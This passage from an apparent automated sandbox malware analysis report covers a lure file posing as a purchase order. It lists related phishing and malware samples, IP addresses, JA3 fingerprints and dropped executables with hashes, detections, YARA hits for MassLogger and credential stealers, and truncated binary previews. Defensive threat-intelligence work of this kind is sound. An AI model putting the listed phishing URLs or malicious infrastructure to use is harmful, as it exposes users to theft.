                                                                                                                                                                                                                                                            https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSPT0wVekqsfeOZRSaz9d28itE0eTxOetbwlGaCx05rQJywXo_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aRXzCg4yzvno75Wb80hSd5kw8Ua5r4R2pwCFTS4zDFYiEkWB-2BYk1VUWtpkJwb9IQIMAq1SSLT005wiJ2XiGw1jPEr6v61MJQRnC7AeLVtxYgqGlydBoPFbs1IP04-2BxPajuRI3fTsnzWZ9ty3RasYpwuqdrF0E8VoyYkggeeLEm9ENK69uYTCVHWHpxCPkzirQSIkvpt5FNZojg491ibS35IgO0LPU5gnpEaeaUj4-2BZoFUHIAAzMMy-2BYqsZ9F9Ldu1c-3D#XGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                            • 18.245.60.74
                                                                                                                                                                                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                                                                                                                                            • 54.171.230.55
                                                                                                                                                                                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                                                                                                                                            • 54.171.230.55
                                                                                                                                                                                                                                                            boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                            • 54.171.230.55
                                                                                                                                                                                                                                                            arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                            • 54.171.230.55
                                                                                                                                                                                                                                                            Invdoc80.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                            • 52.219.125.106
                                                                                                                                                                                                                                                            https://padlet.com/prowebsolutions488/new-message-jba6y6w7rg9tzzmnGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                            • 18.245.86.58
                                                                                                                                                                                                                                                            XB6SkLK7Al.dllGet hashmaliciousWannacryBrowse
                                                                                                                                                                                                                                                            • 3.121.114.254

                                                                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                            05af1f5ca1b87cc9cc9b25185115607dPayment Swift Advice-398379.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                                                                                            ILxa85qCjP.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                                                                                            File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                                                                                            Pago.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                                                                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                                                                                            NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                                                                                            rcNDmdah2W.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                                                                                            SLNA_Updated_Medical_Grant_Application(1).docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                                                                                            CMR ART009.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                                                                                            Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                                                                                            Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            • 104.21.80.1

                                                                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\Microsofts.exePO#3_RKG367.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                              PO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                                PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                                  PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                                    PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                                      Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exeGet hashmaliciousMassLogger RATBrowse

                                                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\PO#_1100015533.scr
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1290240
                                                                                                                                                                                                                                                                        Entropy (8bit):5.277746377151687
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:mImGUcsvZZdubv7Erl3kXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:mxGBcTl0sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                        MD5:096F8412E89BED51F0B5E63CFDD50EDA
                                                                                                                                                                                                                                                                        SHA1:ED860A745F40BFEA79E94DA95EC7B376C54BC504
                                                                                                                                                                                                                                                                        SHA-256:ADC78A694040BAEDFA87FF024283D29A50852A2CDC52E39E4F452EC14E2CC226
                                                                                                                                                                                                                                                                        SHA-512:E5BFE0AA9337C9D8EDC9DB4ECA76FD58BB1EDA4131CA8B8B7E77344934DAFA6F36BFAC4496C87B00C9BCD8309A86A5D7219996BC3453A65FD09AEAF10A2C223F
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...V.+d..........................................@.........................................................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2294272
                                                                                                                                                                                                                                                                        Entropy (8bit):7.0403122701112615
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:O3wR2xs4r4VMm9qRzzFbju+Gb2PJsWT12BDmg27RnWGj:N24dqRzgOJ2BD527BWG
                                                                                                                                                                                                                                                                        MD5:B3D71DB728AA368F048DC207BE9BC9B7
                                                                                                                                                                                                                                                                        SHA1:90ABF3A0950254FB21AB673EC90BB5096B08A626
                                                                                                                                                                                                                                                                        SHA-256:FB3C84D73938E663F32C193BAD4C252B48B5496B70543F47FBFA6F67FB59004A
                                                                                                                                                                                                                                                                        SHA-512:3B329E9444FD35E250D054783570DA762487A95295B1B64BF14B29D406FA8F9F272DF96BCA027B00067B6D0ECF9FE7E3FE13D57A45E44BB0015DB9F093A4F307
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...w..c.........."..........F.................@.............................P$......-#... ..........................................U..Z...rU.......0..........D....................C.......................B..(.......8............]...............................text............................... ..`.rdata...5.......6..................@..@.data........0......................@....pdata..D...........................@..@.00cfg..(...........................@..@.gxfg....).......*..................@..@.retplnel................................tls................................@....voltbl.F..............................._RDATA....... ......................@..@.rsrc........0......................@..@.reloc.......P......................@...........................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Mozilla Maintenance Service\logs\logF529.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2257
                                                                                                                                                                                                                                                                        Entropy (8bit):4.574646680658393
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:mHAfECJTkRK1mtKiJqLXJkqI6v3BqMdJ/Jd2enyD:wAfECJTkFKiJqLWk3oMdJ/Jd25
                                                                                                                                                                                                                                                                        MD5:F39DBD2946034C065D2E560FE4ED6BAC
                                                                                                                                                                                                                                                                        SHA1:B0FA999C3C2EDA0FFEDEBCB60F25A1965B1DD9CE
                                                                                                                                                                                                                                                                        SHA-256:BEAE30D4E7E25EFFB24E1B2EEA0593489FF5C1A815C8CF673249E055F54FA497
                                                                                                                                                                                                                                                                        SHA-512:CB62DDC4CB456B6DFF4B3EBE4C50DBEEA47C8A127C0DE1250E2EA41C1EAACAFB2CB47B9E605A69B9FC6F83839CB00CE4EA86F08CE133638BABCE408A44D728D5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...Disabled unneeded token privilege: SeAuditPrivilege...Disabled unneeded token privilege: SeBackupPrivilege...Disabled unneeded token privilege: SeCreateGlobalPrivilege...Disabled unneeded token privilege: SeCreatePagefilePrivilege...Disabled unneeded token privilege: SeCreatePermanentPrivilege...Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..Disabled unneeded token privilege: SeDebugPrivilege...Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..Disabled unneeded token privilege: SeImpersonatePrivilege...Disabled unneeded token privilege: SeIncreaseBasePriorityPrivilege...Disabled unneeded token privilege: SeIncreaseQuotaPrivilege...Disabled unneeded token privilege: SeIncreaseWorkingSetPrivilege...Disabled unneeded token privilege: SeLoadDriverPrivilege...Disabled unneeded token privilege: SeLockMemory

                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2257
                                                                                                                                                                                                                                                                        Entropy (8bit):4.574646680658393
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:mHAfECJTkRK1mtKiJqLXJkqI6v3BqMdJ/Jd2enyD:wAfECJTkFKiJqLWk3oMdJ/Jd25
                                                                                                                                                                                                                                                                        MD5:F39DBD2946034C065D2E560FE4ED6BAC
                                                                                                                                                                                                                                                                        SHA1:B0FA999C3C2EDA0FFEDEBCB60F25A1965B1DD9CE
                                                                                                                                                                                                                                                                        SHA-256:BEAE30D4E7E25EFFB24E1B2EEA0593489FF5C1A815C8CF673249E055F54FA497
                                                                                                                                                                                                                                                                        SHA-512:CB62DDC4CB456B6DFF4B3EBE4C50DBEEA47C8A127C0DE1250E2EA41C1EAACAFB2CB47B9E605A69B9FC6F83839CB00CE4EA86F08CE133638BABCE408A44D728D5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...Disabled unneeded token privilege: SeAuditPrivilege...Disabled unneeded token privilege: SeBackupPrivilege...Disabled unneeded token privilege: SeCreateGlobalPrivilege...Disabled unneeded token privilege: SeCreatePagefilePrivilege...Disabled unneeded token privilege: SeCreatePermanentPrivilege...Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..Disabled unneeded token privilege: SeDebugPrivilege...Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..Disabled unneeded token privilege: SeImpersonatePrivilege...Disabled unneeded token privilege: SeIncreaseBasePriorityPrivilege...Disabled unneeded token privilege: SeIncreaseQuotaPrivilege...Disabled unneeded token privilege: SeIncreaseWorkingSetPrivilege...Disabled unneeded token privilege: SeLoadDriverPrivilege...Disabled unneeded token privilege: SeLockMemory

                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1293312
                                                                                                                                                                                                                                                                        Entropy (8bit):5.318474212877287
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:k+zOwsOg4DrVZ0Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:kwLZrVSsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                        MD5:5834C05D84CD41A0A0D4619A6C0CB933
                                                                                                                                                                                                                                                                        SHA1:E23A65C47D0FE1E23F5D43CB5B733BD5F2A70BF2
                                                                                                                                                                                                                                                                        SHA-256:1B44A1D789C338884609990A788E0E4A6FFB229B0C3D83FF0320C6A4B5A36583
                                                                                                                                                                                                                                                                        SHA-512:DFA600CEB9C4D5BE472208BC82A38E37060F652D756B824C024D8528483ABAB0AA1FEAB763E737E9B1AADBCE5C846F9408C24A0F675B6C33D192E8056A0C0730
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8...Y...Y...Y.......Y......cY.......Y..u.H..Y.......Y.......Y.......Y.......Y...Y..ZY..~....Y..y.p..Y..~....Y..Rich.Y..................PE..L...aw.X.........."..................O............@.................................*.......................................L[.......................................P..T...........................hP..@............................................text............................... ..`.rdata..............................@..@.data...P....p.......X..............@....gfids...............b..............@..@.rsrc................d..............@..@.reloc...`.......P...l..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1297408
                                                                                                                                                                                                                                                                        Entropy (8bit):5.284560300523996
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:xjrNF/Z1GtFHXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:xnGXHsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                        MD5:5C0F3D6E71BB2A109415D2A283E0824D
                                                                                                                                                                                                                                                                        SHA1:44F7823780EBF2932222B13A4B9E641C8D4EAC93
                                                                                                                                                                                                                                                                        SHA-256:6E38301D2CC3C6704CEA20B5C2C453E5C091A2F6FA4FB923D38C5A4F917E05DC
                                                                                                                                                                                                                                                                        SHA-512:13310B2449C506D7E15C34E0D667992B744F2F2B46F335836E4981AF7CDA112BB41FA183874E9509F14DB54C9D1C23034E4AEAA44371F71C6BAE28BDD3E103B1
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v.<...o...o...o...o...o...o...o...oF..o.o.o...o.o.o...o.o.o...o.o.o...o.o.o...oRich...o........................PE..d...OUIK..........".................hC.........@.............................0......S........................................................=..........0...........................`...8............................................................................text............................... ..`.rdata...e.......f..................@..@.data....9...p.......V..............@....pdata...............l..............@..@.rsrc...0...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Program Files\Windows Media Player\wmpnetwk.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2106368
                                                                                                                                                                                                                                                                        Entropy (8bit):6.891491654490368
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24576:vj9F3pnjgGHVVPZRR+riYiPe2QrUuxDnhHu8BsWsqjnhMgeiCl7G0nehbGZpbD:pMgVRWpdnrUuxDhO8hDmg27RnWGj
                                                                                                                                                                                                                                                                        MD5:927D0D9DE584866A9ADBE0F2CC93C44E
                                                                                                                                                                                                                                                                        SHA1:403A388D60DE2320125E3F3530ADEDE5A87AD999
                                                                                                                                                                                                                                                                        SHA-256:76ED1420B2B62AF257CAB882529F2045D5E3783B43977466A51D60E5DA114603
                                                                                                                                                                                                                                                                        SHA-512:B70510B18ADD01C03504559860B19BB8405318DAE508823231E002A8BAC3809200AC1432B4B66DEC8EF36DEF48C6F8D1D0AF55EB3C926ECE4AAD11A1EACB91AB
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D..S%..S%..S%..t..F%..Z]..P%..Z]n.B%..Z]y.J%..S%..$..Z]i.F%..Z]`.'%..Z]~.R%..Z]{.R%..RichS%..........................PE..d......L.........."........................................................... ......i .............. ......................................8........P...*..........................0...........................................$....................................text...`........................... ..`.data...p~... ...4..................@....pdata...............:..............@..@.rsrc....*...P...,..................@..@.reloc... ..........................@...U..L.......L.......L.......L....7..L.......L.......L....0..L....,..L....Q..L....%..L.......L.......L.......L.......L....0..L............ADVAPI32.dll.ntdll.DLL.KERNEL32.dll.msvcrt.dll.USER32.dll.OLEAUT32.dll.ole32.dll.WSOCK32.dll.ws2_32.DLL.IPHLPAPI.DLL.SHLWAPI.dll.USERENV.dll.WTSAPI32.dl

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                                                                                        Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:@...e...........................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\0bzdjrjj.tgy.ps1

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1202kexm.51l.psm1

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Microsofts.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\PO#_1100015533.scr
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):98816
                                                                                                                                                                                                                                                                        Entropy (8bit):5.666546286050177
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:qwa4JaIFveZKGAmwJVeDhp0dqnjErVf4UMR7pspNYZd:24Jj4ZKGHwJVeDDKqnj6bMDspNC
                                                                                                                                                                                                                                                                        MD5:F6B8018A27BCDBAA35778849B586D31B
                                                                                                                                                                                                                                                                        SHA1:81BDE9535B07E103F89F6AEABDB873D7E35816C2
                                                                                                                                                                                                                                                                        SHA-256:DDC6B2BD4382D1AE45BEE8F3C4BB19BD20933A55BDF5C2E76C8D6C46BC1516CE
                                                                                                                                                                                                                                                                        SHA-512:AA958D22952D27BAD1C0D3C9D08DDBF364274363D5359791B7B06A5D5D91A21F57E9C9E1079F3F95D7CE5828DCD3E79914FF2BD836F347B5734151D668D935DE
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: unknown
                                                                                                                                                                                                                                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 91%
                                                                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                                                                        • Filename: PO#3_RKG367.bat, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        • Filename: PO#5_Tower_049.bat, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        • Filename: PO_B2W984.com, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        • Filename: PO_2024_056209_MQ04865_ENQ_1045.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        • Filename: PO_KB#67897.cmd, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        • Filename: Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....nH...............P..x............... ........@.. ....................................`.....................................S.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H...................Z....................................................}.....is.......................~...F...@...7...%...m...$...~...~...d...r...a...G...o...n...~.....(....*&..( ....*.s!........s"........s#........s$........s%........*Z........o8...........*&..(9....*&........*".......*Vs....(B...t.........*..(C...*"~....+.*"~....+.*"~....+.*"~....+.*"~....+.*b.r...p.oa...(....(@....*:.~.....o....&*.*:.(P....(Q....*..~3...,.~3...+.~1.....x...s....%.3...(.....*..(Y....(L...

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\PO#_1100015533.scr
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):70656
                                                                                                                                                                                                                                                                        Entropy (8bit):4.910353963160109
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
                                                                                                                                                                                                                                                                        MD5:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                                                                                        SHA1:396E954077D21E94B7C20F7AFA22A76C0ED522D0
                                                                                                                                                                                                                                                                        SHA-256:F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
                                                                                                                                                                                                                                                                        SHA-512:227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
